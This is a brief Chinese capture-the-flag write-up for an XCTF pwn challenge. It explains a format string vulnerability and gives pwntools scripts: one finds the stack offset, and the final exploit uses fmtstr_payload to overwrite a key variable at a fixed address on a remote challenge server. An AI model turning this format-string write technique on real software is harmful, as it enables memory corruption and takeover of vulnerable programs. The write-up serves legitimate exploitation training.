[攻防世界 pwn]——實時數據監測

• 題目地址：https://adworld.xctf.org.cn/
• 題目：
  

checksec就不說了，沒什么

ida中

只要將key里面的值修改為35795746,就好

寫個小腳本在pwndbg中看看偏移

from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 payload = 'aaaa%4$s' p.sendline(payload) p.interactive()

發現偏移位12，距離輸入

所以，exploit如下，fmtstr_payload是pwntools集成的模板，對于第一個參數是offest（偏移），后面是地址，和地址中寫入的值。

exploit

from pwn import * #p = process('./pwn') #gdb.attach(p, 'b *0x080484A7') p = remote("111.200.241.244",48715) key_addr = 0x0804A048 payload = fmtstr_payload(12,{key_addr:35795746}) p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[攻防世界 pwn]——实时数据监测的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。